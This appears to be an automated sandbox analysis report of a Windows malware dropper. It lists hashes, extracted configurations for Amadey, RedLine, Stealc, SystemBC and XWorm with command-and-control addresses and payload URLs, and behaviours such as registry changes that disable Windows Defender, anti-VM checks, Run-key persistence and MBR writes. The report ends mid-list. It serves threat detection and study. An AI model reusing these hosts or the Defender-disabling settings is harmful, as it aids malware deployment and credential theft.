Analysis
-
max time kernel
106s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
19-02-2025 03:03
Static task
static1
Behavioral task
behavioral1
Sample
2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe
Resource
win10v2004-20250217-en
General
-
Target
2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe
-
Size
2.1MB
-
MD5
ffa05200d7a741017eb476eef981b041
-
SHA1
2272ca724539b2e2bef16f3017c1e1e3db9e9485
-
SHA256
2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001
-
SHA512
55be906ff0385337b94ea090d1ccb3c4fd0e7d813adca5d6eccd2cfc40c1cbcf3f68a981cf0f97e457737a0b1b57745870e8ded6e58a6834556cd0bfcb8531a9
-
SSDEEP
49152:1CYg6rMK/aiLLsFf8lTlcZuY+1HSkB1SOpIBC8MiH:i6rbaiEiWH+YklIBC8MiH
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
xworm
5.0
45.154.98.175:7000
0HzpJoisb4u9PgIO
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000e0000000122f9-2088.dat family_xworm behavioral1/memory/4656-2095-0x0000000000030000-0x0000000000040000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2784-197-0x0000000001350000-0x00000000017B0000-memory.dmp healer behavioral1/memory/2784-188-0x0000000001350000-0x00000000017B0000-memory.dmp healer behavioral1/memory/2784-308-0x0000000001350000-0x00000000017B0000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral1/memory/1620-359-0x00000000001D0000-0x0000000000648000-memory.dmp family_sectoprat behavioral1/memory/1620-360-0x00000000001D0000-0x0000000000648000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Systembc family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 22 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 90e0ad4bc6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 257dc22f39.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0912c4b7df.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1be380a7e3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 51798fd265.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2dcd38c299.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3f44d4da90.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempHWAXXYDHWXWEVPXVSGGRRCMVPHW93DYD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8f4869ffea.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2f051bfec5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9debe854f4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ wxlfj.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 892cde147c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 11 1780 powershell.exe 28 1708 powershell.exe 62 1728 powershell.exe -
pid Process 3112 powershell.exe 688 powershell.exe 1532 powershell.exe 2380 powershell.exe 1708 powershell.exe 1728 powershell.exe 1780 powershell.exe -
Downloads MZ/PE file 13 IoCs
flow pid Process 11 1780 powershell.exe 62 1728 powershell.exe 63 3068 futors.exe 5 1648 skotes.exe 5 1648 skotes.exe 8 1648 skotes.exe 8 1648 skotes.exe 8 1648 skotes.exe 8 1648 skotes.exe 8 1648 skotes.exe 30 948 BitLockerToGo.exe 37 1496 BitLockerToGo.exe 28 1708 powershell.exe -
Uses browser remote debugging 2 TTPs 3 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1196 chrome.exe 1868 chrome.exe 1348 chrome.exe -
Checks BIOS information in registry 2 TTPs 44 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3f44d4da90.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3f44d4da90.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 257dc22f39.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 257dc22f39.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempHWAXXYDHWXWEVPXVSGGRRCMVPHW93DYD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 51798fd265.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion wxlfj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 51798fd265.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2dcd38c299.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 90e0ad4bc6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0912c4b7df.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8f4869ffea.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2f051bfec5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 892cde147c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2dcd38c299.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9debe854f4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1be380a7e3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1be380a7e3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 892cde147c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0912c4b7df.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wxlfj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2f051bfec5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 90e0ad4bc6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempHWAXXYDHWXWEVPXVSGGRRCMVPHW93DYD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9debe854f4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8f4869ffea.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE -
Executes dropped EXE 37 IoCs
pid Process 1648 skotes.exe 3044 oVpNTUm.exe 1248 3omTNLZ.exe 1480 257584c93d.exe 2160 wxlfj.exe 2896 Ta3ZyUR.exe 2784 TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE 1348 Ta3ZyUR.exe 2112 Ta3ZyUR.exe 2656 Ta3ZyUR.exe 2096 Ta3ZyUR.exe 2164 d2YQIJa.exe 2224 2f051bfec5.exe 2716 483d2fa8a0d53818306efeb32d3.exe 2764 892cde147c.exe 1972 51798fd265.exe 1620 2dcd38c299.exe 2296 3f44d4da90.exe 1916 amnew.exe 3068 futors.exe 2420 90e0ad4bc6.exe 2380 257dc22f39.exe 2100 f63e940856.exe 2540 636ca944cf.exe 3580 TempHWAXXYDHWXWEVPXVSGGRRCMVPHW93DYD.EXE 3676 monthdragon.exe 4028 monthdragon.exe 4048 0912c4b7df.exe 3608 9debe854f4.exe 2992 1be380a7e3.exe 1148 3omTNLZ.exe 3260 8bf3eae87e.exe 3596 7aencsM.exe 2848 7aencsM.exe 3656 8f4869ffea.exe 2288 DTQCxXZ.exe 236 oVpNTUm.exe -
Identifies Wine through registry keys 2 TTPs 22 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 0912c4b7df.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 8f4869ffea.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 892cde147c.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 3f44d4da90.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 1be380a7e3.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 90e0ad4bc6.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 257dc22f39.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 9debe854f4.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 2f051bfec5.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempHWAXXYDHWXWEVPXVSGGRRCMVPHW93DYD.EXE Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine wxlfj.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 51798fd265.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine 2dcd38c299.exe -
Loads dropped DLL 64 IoCs
pid Process 2108 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe 2108 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1780 powershell.exe 1780 powershell.exe 2896 Ta3ZyUR.exe 2896 Ta3ZyUR.exe 2896 Ta3ZyUR.exe 2896 Ta3ZyUR.exe 2368 WerFault.exe 2368 WerFault.exe 2368 WerFault.exe 2368 WerFault.exe 2368 WerFault.exe 1648 skotes.exe 1648 skotes.exe 1708 powershell.exe 1708 powershell.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1916 amnew.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 2288 WerFault.exe 2288 WerFault.exe 2288 WerFault.exe 948 BitLockerToGo.exe 1648 skotes.exe 1728 powershell.exe 1728 powershell.exe 3068 futors.exe 3068 futors.exe 3676 monthdragon.exe 1648 skotes.exe 1648 skotes.exe 3136 WerFault.exe 3136 WerFault.exe 3136 WerFault.exe 1496 BitLockerToGo.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 1648 skotes.exe 3068 futors.exe 1648 skotes.exe 3596 7aencsM.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe 2780 WerFault.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\90e0ad4bc6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086725001\\90e0ad4bc6.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\257dc22f39.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086726001\\257dc22f39.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\f63e940856.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086727001\\f63e940856.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\636ca944cf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086728001\\636ca944cf.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\8bf3eae87e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008020101\\8bf3eae87e.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\8f4869ffea.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008030101\\8f4869ffea.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\257584c93d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086705101\\257584c93d.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086706021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 1be380a7e3.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00050000000195c3-79.dat autoit_exe behavioral1/files/0x000e00000001a4a9-767.dat autoit_exe behavioral1/files/0x000600000001a4ff-847.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs
pid Process 2108 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe 1648 skotes.exe 3044 oVpNTUm.exe 1248 3omTNLZ.exe 2160 wxlfj.exe 2784 TempDHFZPU7JH9F9TGGPQHMOE3HEI1KSACKX.EXE 2164 d2YQIJa.exe 2224 2f051bfec5.exe 2716 483d2fa8a0d53818306efeb32d3.exe 2764 892cde147c.exe 1972 51798fd265.exe 1620 2dcd38c299.exe 2296 3f44d4da90.exe 2420 90e0ad4bc6.exe 2380 257dc22f39.exe 3580 TempHWAXXYDHWXWEVPXVSGGRRCMVPHW93DYD.EXE 4048 0912c4b7df.exe 3608 9debe854f4.exe 2992 1be380a7e3.exe 1148 3omTNLZ.exe 3656 8f4869ffea.exe 236 oVpNTUm.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2896 set thread context of 2096 2896 Ta3ZyUR.exe 58 PID 2224 set thread context of 948 2224 2f051bfec5.exe 70 PID 2764 set thread context of 1496 2764 892cde147c.exe 75 PID 3676 set thread context of 4028 3676 monthdragon.exe 113 PID 3596 set thread context of 2848 3596 7aencsM.exe 125 -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe File created C:\Windows\Tasks\wxlfj.job oVpNTUm.exe File opened for modification C:\Windows\Tasks\wxlfj.job oVpNTUm.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 2368 2896 WerFault.exe 51 2288 2296 WerFault.exe 76 3136 3676 WerFault.exe 112 2780 3596 WerFault.exe 124 1208 2660 WerFault.exe 162 4340 4252 WerFault.exe 164 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 892cde147c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0912c4b7df.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2f051bfec5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language f63e940856.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 257dc22f39.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oVpNTUm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 8bf3eae87e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f63e940856.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 636ca944cf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9debe854f4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 257584c93d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 90e0ad4bc6.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage f63e940856.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8f4869ffea.exe Key opened 